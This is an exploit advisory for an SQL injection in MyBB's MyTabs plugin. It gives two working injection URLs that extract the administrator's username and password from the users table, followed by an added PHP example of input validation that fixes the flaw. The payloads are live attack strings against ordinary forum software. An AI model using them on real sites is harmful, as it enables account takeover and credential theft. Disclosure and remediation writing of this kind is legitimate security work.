# Exploit title: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR. SQL
# Vulnerable Software Link: http://mods.mybb.com/view/mytabs
Vulnerability:
$ ~ http://www.bkjia.com/mybbpath/index.php?tab=[SQLi]
---------------------------------------
#~ Expl0itation ~ #
---------------------------------------
$ ~ Get the administrator's username (usually it has uid = 1) ~
http://www.bkjia.com/mybbpath/index.php?tab=1' and (select 1 from (select count (*), concat (select username from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B )---
$ ~ Get the administrator's password ~
http://www.bkjia.com/mybbpath/index.php?tab=1' and (select 1 from (select count (*), concat (select password from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B )---
_________________
Fix: filter the tab parameter on the index.php page before it is used in a query.
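As an added example (this is not code from the MyTabs plugin or from MyBB, and the advisory does not show the plugin's own source), one way to apply that fix inside a MyBB plugin: coerce the `tab` request value to a positive integer before it can reach the database, and build the WHERE clause only from that integer. The table name `mytabs`, the column `tid` and the two function names are hypothetical; `$db->simple_select()` and `$db->fetch_array()` are MyBB's real database API.

```php
<?php
// Added example, not the MyTabs plugin's code. Assumptions (hypothetical):
// the plugin looks a tab up by numeric id in a table named `mytabs` with an
// integer primary key `tid`; $db is MyBB's database handle.

/**
 * Normalise an untrusted `tab` request value into a safe integer id.
 * Returns 0 (meaning "no tab") for anything that is not a positive decimal
 * number, so a value such as  1' and (select ...  is dropped entirely
 * instead of being spliced into SQL.
 */
function mytabs_clean_tab_id($raw)
{
    if (!is_string($raw) && !is_int($raw)) {
        return 0;                       // arrays, null, objects: reject
    }
    $raw = trim((string) $raw);
    // ctype_digit() accepts only 0-9, so quotes, spaces, signs and SQL
    // keywords are rejected before any cast happens.
    if ($raw === '' || !ctype_digit($raw)) {
        return 0;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : 0;
}

/**
 * Fetch one tab row by id. The WHERE clause contains only an integer that
 * this code produced, never the raw request string.
 */
function mytabs_fetch_tab($db, $raw_tab)
{
    $tid = mytabs_clean_tab_id($raw_tab);
    if ($tid === 0) {
        return null;                    // caller falls back to the default tab
    }
    // Builds: SELECT * FROM <prefix>mytabs WHERE tid='<integer>'
    $query = $db->simple_select('mytabs', '*', "tid='{$tid}'");
    return $db->fetch_array($query);
}

// Usage in the plugin's page hook (MyBB 1.6 style request access):
//   $tab = mytabs_fetch_tab($db, $mybb->input['tab']);
// On MyBB 1.8 the same integer coercion is available from the core as
//   $mybb->get_input('tab', MyBB::INPUT_INT)
// and mytabs_fetch_tab() can be handed that value directly.
```

If a plugin's tab identifier is a string rather than a number, the equivalent defence is to compare the value against a fixed whitelist of known tab names and, for anything that must still be interpolated, pass it through `$db->escape_string()`; the principle is the same as above: the request value is either converted to a type that cannot carry SQL or rejected.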
# Greetz: Programer, Dr. moka, eragon, BaDBoY-AL, z3r0w1zard, Red Dragon_aL, Pretorian, Th3_Power, R-t33n, Ace Wizard, KubaNnez1, ssgodfather, DJDukli, b4ti, CroSs HackForums. AL members & All our friends.